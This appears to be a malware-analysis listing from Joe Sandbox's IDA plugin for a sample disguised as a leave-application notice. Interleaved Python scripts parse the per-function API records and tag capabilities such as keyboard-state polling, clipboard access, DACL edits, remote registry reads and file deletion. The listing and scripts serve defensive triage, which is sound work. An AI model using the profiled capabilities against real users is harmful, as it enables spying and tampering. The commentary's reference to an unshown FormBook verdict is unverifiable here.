                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FBA7A1
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FBA7C2
                                                      • CopySid.ADVAPI32(00000000), ref: 00FBA7C9
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FBA7FA
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FBA820
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FBA834
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: 48831a07968a1513f78fb6869d44edbb26625dfcf71b12597d3af92c93f75bb2
                                                      • Instruction ID: feb666d7b6a516c88821bb4f32c22f8d9aeb055afbaab953033b09654f3bea1a
                                                      • Opcode Fuzzy Hash: 48831a07968a1513f78fb6869d44edbb26625dfcf71b12597d3af92c93f75bb2
                                                      • Instruction Fuzzy Hash: 5B514871900209BBDF11DFA6DC44AEEBBB9FF04310F148129F915AA280DB39DA06DF61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                      • API String ID: 0-4052911093
                                                      • Opcode ID: 0c74db43d1e4d729fbae362005f5bee0ff0479b78426def9a5f9424880d1e037
                                                      • Instruction ID: e771cc99c16178c219a80a4c70a5a1ff09b5352c4f9cc464e3093741aebc1cf9
                                                      • Opcode Fuzzy Hash: 0c74db43d1e4d729fbae362005f5bee0ff0479b78426def9a5f9424880d1e037
                                                      • Instruction Fuzzy Hash: 2D728171E04319DBEF25EF58C8407EEB7B5BF48310F2441AAE955EB281DB349A81DB90
                                                      APIs
                                                        • Part of subcall function 00FC6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FC5FA6,?), ref: 00FC6ED8
                                                        • Part of subcall function 00FC72CB: GetFileAttributesW.KERNEL32(?,00FC6019), ref: 00FC72CC
                                                      • _wcscat.LIBCMT ref: 00FC6441
                                                      • __wsplitpath.LIBCMT ref: 00FC645F
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FC6474
                                                      • _wcscpy.LIBCMT ref: 00FC64A3
                                                      • _wcscat.LIBCMT ref: 00FC64B8
                                                      • _wcscat.LIBCMT ref: 00FC64CA
                                                      • DeleteFileW.KERNEL32(?), ref: 00FC64DA
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FC64EB
                                                      • FindClose.KERNEL32(00000000), ref: 00FC6506
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                      • String ID: \*.*
                                                      • API String ID: 2643075503-1173974218
                                                      • Opcode ID: e32f54697426871f58623f0f1338e1669b3ed1f6f315ee547859a7cfd4eab36b
                                                      • Instruction ID: 7791143148fb0c016a8c2c529078700cbc68b42f956e47747e19487d5867347b
                                                      • Opcode Fuzzy Hash: e32f54697426871f58623f0f1338e1669b3ed1f6f315ee547859a7cfd4eab36b
                                                      • Instruction Fuzzy Hash: 493191B240C385AAC321EBE48985EDBB7DCAB56310F04492EF5D9C3141EA3AD50D9777
                                                      APIs
                                                        • Part of subcall function 00FE3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FE2BB5,?,?), ref: 00FE3C1D
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FE328E
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00FE332D
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00FE33C5
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00FE3604
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FE3611
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: f92caab23db1656ef180924f9d2fd5aaf69f620cda99563b50593ef776810cc1
                                                      • Instruction ID: d76b21068ab6b0d573146b769e8260466f8e93fbad563c5614c347138caa8334
                                                      • Opcode Fuzzy Hash: f92caab23db1656ef180924f9d2fd5aaf69f620cda99563b50593ef776810cc1
                                                      • Instruction Fuzzy Hash: 98E16E31604201AFCB15DF69CD99E6ABBE8EF88720F04886DF44AD72A1CB35ED05DB51
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00FC2B5F
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00FC2BE0
                                                      • GetKeyState.USER32(000000A0), ref: 00FC2BFB
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00FC2C15
                                                      • GetKeyState.USER32(000000A1), ref: 00FC2C2A
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00FC2C42
                                                      • GetKeyState.USER32(00000011), ref: 00FC2C54
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00FC2C6C
                                                      • GetKeyState.USER32(00000012), ref: 00FC2C7E
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00FC2C96
                                                      • GetKeyState.USER32(0000005B), ref: 00FC2CA8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 857bfc7265b02df1e44cccfadff65e4d4b2b96ae3a3ab6f7962d7666ea556841
                                                      • Instruction ID: b71c0fba0613a7ec18fb1b1855a94a90d49c4c1016bd0bbbbc50320583cec61a
                                                      • Opcode Fuzzy Hash: 857bfc7265b02df1e44cccfadff65e4d4b2b96ae3a3ab6f7962d7666ea556841
                                                      • Instruction Fuzzy Hash: E141E830D047CB6DFFB5DBA08606BA9BEA0EB11334F04404DD9C6562C1DBA99DC8E762
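The records above are easier to triage in bulk than by eye: the key-state routine at 00FC2B5F..00FC2CA8, the DACL-editing routine at 00FBA6D0..00FBA834, the recursive FindFirstFileW/DeleteFileW walker, and the RegConnectRegistryW reader each imply a capability that a reviewer wants flagged before reading the disassembly. The script below is an added example and not Joe Sandbox tooling; it parses records in the layout this page uses (the bullet "APIs" lines and the "Similarity" key/value lines), tags each function by the capabilities of its direct API calls, decodes the virtual-key constants passed to GetKeyState/GetAsyncKeyState, and checks that the Opcode ID and Opcode Fuzzy Hash agree. The capability table and the two embedded sample records (copied from this listing and trimmed) are the example's own assumptions.

```python
"""Triage Joe Sandbox per-function records (the 'APIs' / 'Similarity' blocks).
Added example, not Joe Sandbox code; record layout taken from this page, the
capability table and the embedded samples are this example's own assumptions."""
import re
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class ApiCall:
    name: str                          # e.g. GetAsyncKeyState
    module: str                        # e.g. USER32
    args: list                         # argument column as printed; '?' = unresolved
    ref: str                           # call-site address
    via_subcall: Optional[str] = None  # callee address on "Part of subcall function" lines


@dataclass
class Record:
    apis: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)  # API ID, Opcode ID, fuzzy hashes


SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Two shapes of API line occur on the page:
#   • GetKeyState.USER32(000000A0), ref: 00FC2BFB
#   • _wcscmp.LIBCMT ref: 00FD1C0E
API_LINE = re.compile(
    r"^\u2022\s+(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]+)$"
)
KV_LINE = re.compile(r"^\u2022\s+(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")

# Constructed sample: two records from this page, trimmed to the fields used here.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 00FC2B5F
• GetAsyncKeyState.USER32(000000A0), ref: 00FC2BE0
• GetKeyState.USER32(000000A0), ref: 00FC2BFB
Memory Dump Source
• Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 857bfc7265b02df1e44cccfadff65e4d4b2b96ae3a3ab6f7962d7666ea556841
• Opcode Fuzzy Hash: 857bfc7265b02df1e44cccfadff65e4d4b2b96ae3a3ab6f7962d7666ea556841
• Instruction Fuzzy Hash: E141E830D047CB6DFFB5DBA08606BA9BEA0EB11334F04404DD9C6562C1DBA99DC8E762
APIs
  • Part of subcall function 00FBABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FBABD7
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FBA6D0
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FBA76E
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FBA820
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FBA834
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl
• String ID:
• API String ID: 3996160137-0
• Opcode ID: 48831a07968a1513f78fb6869d44edbb26625dfcf71b12597d3af92c93f75bb2
• Opcode Fuzzy Hash: 48831a07968a1513f78fb6869d44edbb26625dfcf71b12597d3af92c93f75bb2
• Instruction Fuzzy Hash: 5B514871900209BBDF11DFA6DC44AEEBBB9FF04310F148129F915AA280DB39DA06DF61
"""


def parse_records(text):
    """Split the listing into Record objects; a record ends at its Instruction Fuzzy Hash line."""
    records, cur, section = [], Record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        m = API_LINE.match(line)
        if m and section == "APIs":
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append(ApiCall(m.group("name"), m.group("mod"), args, m.group("ref"), m.group("sub")))
            continue
        m = KV_LINE.match(line)
        if m and section == "Similarity":
            cur.similarity[m.group("key")] = m.group("val").strip()
            if m.group("key") == "Instruction Fuzzy Hash":
                records.append(cur)
                cur, section = Record(), None
    return records


# Capability tags keyed by API name (assumed table). A tag says what the code *can* do,
# not that it is malicious: AutoIt's runtime reads modifier keys for Send(), for instance.
CAPABILITIES = {
    "GetAsyncKeyState": "keyboard-state", "GetKeyState": "keyboard-state",
    "GetKeyboardState": "keyboard-state", "OpenClipboard": "clipboard",
    "GetClipboardData": "clipboard", "SetUserObjectSecurity": "object-dacl-change",
    "AddAce": "object-dacl-change", "SetSecurityDescriptorDacl": "object-dacl-change",
    "RegConnectRegistryW": "remote-registry", "RegQueryValueExW": "registry-read",
    "DeleteFileW": "file-delete", "FindFirstFileW": "file-enum",
    "CoInitializeSecurity": "com-security", "CoCreateInstanceEx": "com-instantiate",
}

VK = {"A0": "VK_LSHIFT", "A1": "VK_RSHIFT", "11": "VK_CONTROL", "12": "VK_MENU", "5B": "VK_LWIN"}


def triage(rec):
    """Capability tags from direct calls only; subcall lines belong to the callee's record."""
    return {CAPABILITIES[c.name] for c in rec.apis
            if c.name in CAPABILITIES and c.via_subcall is None}


def vk_names(rec):
    """Decode the constant virtual-key codes passed to the key-state APIs."""
    out = []
    for c in rec.apis:
        if c.name in ("GetAsyncKeyState", "GetKeyState") and c.args and c.args[0] != "?":
            code = (c.args[0].lstrip("0") or "0").upper()
            out.append(VK.get(code, "VK_0x" + code))
    return out


def opcode_id_ok(rec):
    """The page prints Opcode ID and Opcode Fuzzy Hash as the same 64-hex value; flag drift."""
    s = rec.similarity
    return s.get("Opcode ID") == s.get("Opcode Fuzzy Hash") and len(s.get("Opcode ID", "")) == 64


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r.similarity["API ID"], sorted(triage(r)), vk_names(r), opcode_id_ok(r))
```

On this page the key-state routine polls only VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU and VK_LWIN, which is the modifier-key handling one expects from the AutoIt runtime rather than a keystroke logger sweeping the whole key range, so the keyboard-state tag is a prompt to read the function, not a verdict; the FormBook verdict on this sample rests on the injection and credential-theft signatures in the overview, not on this routine.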
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: 0deef5749ce7b52d02358bb0b1c0bbc19a11d4f71f8a7f3ce1dfc86d3333c705
                                                      • Instruction ID: 013c60663ca684a972d189ca0cd6aac23cf3b7b99246245224b8ab166bc53bfe
                                                      • Opcode Fuzzy Hash: 0deef5749ce7b52d02358bb0b1c0bbc19a11d4f71f8a7f3ce1dfc86d3333c705
                                                      • Instruction Fuzzy Hash: 4F21A631700110AFDB21AF94ED49B2D77AAEF08720F04841AF98AD7351CB79EC009B61
APIs
  • Part of subcall function 00FB9ABF: CLSIDFromProgID.OLE32 ref: 00FB9ADC
  • Part of subcall function 00FB9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00FB9AF7
  • Part of subcall function 00FB9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00FB9B05
  • Part of subcall function 00FB9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00FB9B15
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00FDC235
• _memset.LIBCMT ref: 00FDC242
• _memset.LIBCMT ref: 00FDC360
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00FDC38C
• CoTaskMemFree.OLE32(?), ref: 00FDC397
Strings
• NULL Pointer assignment, xrefs: 00FDC3E5
Memory Dump Source
• Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
• Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
• Opcode ID: 834fe5255ba11066ccb71c269cfa12dac8b6cc1a5f99293a22203358520c9e9a
• Instruction ID: c22857d13b248e2abab2ac1ab809e57f9cc1c36c9b7dac1426eaacb82270078a
• Opcode Fuzzy Hash: 834fe5255ba11066ccb71c269cfa12dac8b6cc1a5f99293a22203358520c9e9a
• Instruction Fuzzy Hash: 78915B71D00219ABDB10DFE4DC81EDEBBB9EF08710F14811AF519A7281DB749A45EFA0
APIs
  • Part of subcall function 00FBB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FBB180
  • Part of subcall function 00FBB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FBB1AD
  • Part of subcall function 00FBB134: GetLastError.KERNEL32 ref: 00FBB1BA
• ExitWindowsEx.USER32(?,00000000), ref: 00FC7A0F
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Opcode ID: 6f2060f4f5a92446fe19bc18fce5590cec89b4ab307552a37c5575e8f536017e
• Instruction ID: a78dfab85d1e4dcb7ee5d3b4a3ed5d6ca90fc9d80e7ad949d48874b0c5cc7f54
• Opcode Fuzzy Hash: 6f2060f4f5a92446fe19bc18fce5590cec89b4ab307552a37c5575e8f536017e
• Instruction Fuzzy Hash: B101FC71A583136AF72C76B5DD4BFBF32589700750F14041CBD43A20E1D56D9E00AAB0
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FD8CA8
• WSAGetLastError.WSOCK32(00000000), ref: 00FD8CB7
• bind.WSOCK32(00000000,?,00000010), ref: 00FD8CD3
• listen.WSOCK32(00000000,00000005), ref: 00FD8CE2
• WSAGetLastError.WSOCK32(00000000), ref: 00FD8CFC
• closesocket.WSOCK32(00000000,00000000), ref: 00FD8D10
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Opcode ID: 0cdbef60bfea8daebd68021019b9360134b938e63ef41c62d0dc7aaf48947066
• Instruction ID: fdde9e5c6fb666dc98b07eca6d4b9a950a01d4470c3c94a312400a7c1ab25b27
• Opcode Fuzzy Hash: 0cdbef60bfea8daebd68021019b9360134b938e63ef41c62d0dc7aaf48947066
• Instruction Fuzzy Hash: 1F21E431600201AFCB21EFA4CD45B6E77AAFF48360F144159F95AA73C1CB74AD02EB61
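What a triager usually wants from these per-function summaries is the set of imported APIs per function, grouped and tagged, rather than the raw bullet listing. The parser below is an added example and is not part of the Joe Sandbox report or its IDA plugin; its SAMPLE input is copied from the two entries directly above (the SeShutdownPrivilege/ExitWindowsEx function and the socket/bind/listen function), and the RULES table and the trailing A/W-suffix normalisation are this example's own choices. One caveat when reading the tags: the report classifies the sample as a compiled AutoIt script, and API groups like these are consistent with the AutoIt3 runtime's built-in functions (Shutdown, TCPListen, ProcessList and so on), so a tag on a runtime function records what the embedded script could call, not what it was observed doing.

```python
"""Parse Joe Sandbox 'IDA Plugin' per-function summaries and tag API capabilities.
Added example, not part of the report. SAMPLE is copied from the report; RULES are ours."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# One API bullet: optional "Part of subcall function XXXX:" prefix, then Name.MODULE,
# optional "(args)", then "ref: ADDRESS" (the comma before "ref" is sometimes absent).
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Tag -> API names (A/W suffix stripped) that must all appear in one function. Our own choice.
RULES = {
    "shutdown_with_privilege": {"AdjustTokenPrivileges", "ExitWindowsEx"},
    "listening_socket": {"socket", "bind", "listen"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "dynamic_api_resolution": {"LoadLibrary", "GetProcAddress"},
}

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str
    args: str = ""
    subcall_of: Optional[str] = None  # callee address when listed as "Part of subcall"

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)  # Similarity / dump-source fields

    def api_names(self) -> set[str]:
        # Heuristic: drop a trailing Unicode/ANSI suffix (Process32FirstW -> Process32First).
        return {re.sub(r"(?<=[a-z0-9])[AW]$", "", a.name) for a in self.apis}

def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing into records; "Instruction Fuzzy Hash" is each record's last field."""
    records: list[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            if current is None or "Instruction Fuzzy Hash" in current.meta:
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is None:
            continue
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                current.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["args"] or "", m["sub"]))
        elif section == "Strings":
            m = KV_RE.match(line)  # e.g. "• NULL Pointer assignment, xrefs: 00FDC3E5"
            if m:
                current.strings.append(m["key"].rsplit(", xrefs", 1)[0])
        else:
            m = KV_RE.match(line)
            if m:
                current.meta[m["key"].strip()] = m["val"].strip()
    return records

def tag_record(rec: FunctionRecord) -> set[str]:
    names = rec.api_names()
    return {tag for tag, needed in RULES.items() if needed <= names}

# Constructed input: copied from the two report entries above (dump-source lines omitted).
SAMPLE = """APIs
  • Part of subcall function 00FBB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FBB180
  • Part of subcall function 00FBB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FBB1AD
  • Part of subcall function 00FBB134: GetLastError.KERNEL32 ref: 00FBB1BA
• ExitWindowsEx.USER32(?,00000000), ref: 00FC7A0F
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Instruction Fuzzy Hash: B101FC71A583136AF72C76B5DD4BFBF32589700750F14041CBD43A20E1D56D9E00AAB0
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FD8CA8
• WSAGetLastError.WSOCK32(00000000), ref: 00FD8CB7
• bind.WSOCK32(00000000,?,00000010), ref: 00FD8CD3
• listen.WSOCK32(00000000,00000005), ref: 00FD8CE2
• WSAGetLastError.WSOCK32(00000000), ref: 00FD8CFC
• closesocket.WSOCK32(00000000,00000000), ref: 00FD8D10
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Instruction Fuzzy Hash: 1F21E431600201AFCB21EFA4CD45B6E77AAFF48360F144159F95AA73C1CB74AD02EB61
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.meta.get("API ID"), sorted(rec.api_names()), sorted(tag_record(rec)))
```

Paste the whole function listing from the report into `SAMPLE` (or read it from a file) to get one record per function; the `meta` dict keeps the Instruction Fuzzy Hash, which is the field to pivot on when comparing this runtime against a known-clean AutoIt3 build.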
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FC6554
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00FC6564
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00FC6583
• __wsplitpath.LIBCMT ref: 00FC65A7
• _wcscat.LIBCMT ref: 00FC65BA
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00FC65F9
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
• String ID:
• API String ID: 1605983538-0
• Opcode ID: b3e28c760942b1927e7de70255db413966f08cde35d78eda54ad3773ac70867b
• Instruction ID: c6f71992fa78939b46a56f02db328af2adb3ea2fc26f951b6c9129179dc69f2e
• Opcode Fuzzy Hash: b3e28c760942b1927e7de70255db413966f08cde35d78eda54ad3773ac70867b
• Instruction Fuzzy Hash: 6D21D7B1D04219ABDB21ABA0CD89FDDB7BCAB09310F1004A9F544E3141DB759F84DB60
APIs
  • Part of subcall function 00FDA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00FDA84E
• socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00FD9296
• WSAGetLastError.WSOCK32(00000000,00000000), ref: 00FD92B9
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: 8c048803279c635c91507cec3eed2bea77d925e6be1d52b3f05f13d563c40e39
• Instruction ID: 8e3f617b84683bf24578490fb8f468a3eef90cfd38c307dc591ab97da69ef2e3
• Opcode Fuzzy Hash: 8c048803279c635c91507cec3eed2bea77d925e6be1d52b3f05f13d563c40e39
• Instruction Fuzzy Hash: 2941A371600100AFEB11AFA8CC42E7E77EEEF44724F144559F9569B382DBB89D01AB91
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00FCEB8A
• _wcscmp.LIBCMT ref: 00FCEBBA
• _wcscmp.LIBCMT ref: 00FCEBCF
• FindNextFileW.KERNEL32(00000000,?), ref: 00FCEBE0
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 00FCEC0E
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
• Opcode ID: 0dde1ad9d9b96c2a22b5e1e0d425a417ac77a5b024553161f1650f06f7457c28
• Instruction ID: c7506f16ba31cee8d498e533ff12588c00f97b569143e67efb8adc2914eb3658
• Opcode Fuzzy Hash: 0dde1ad9d9b96c2a22b5e1e0d425a417ac77a5b024553161f1650f06f7457c28
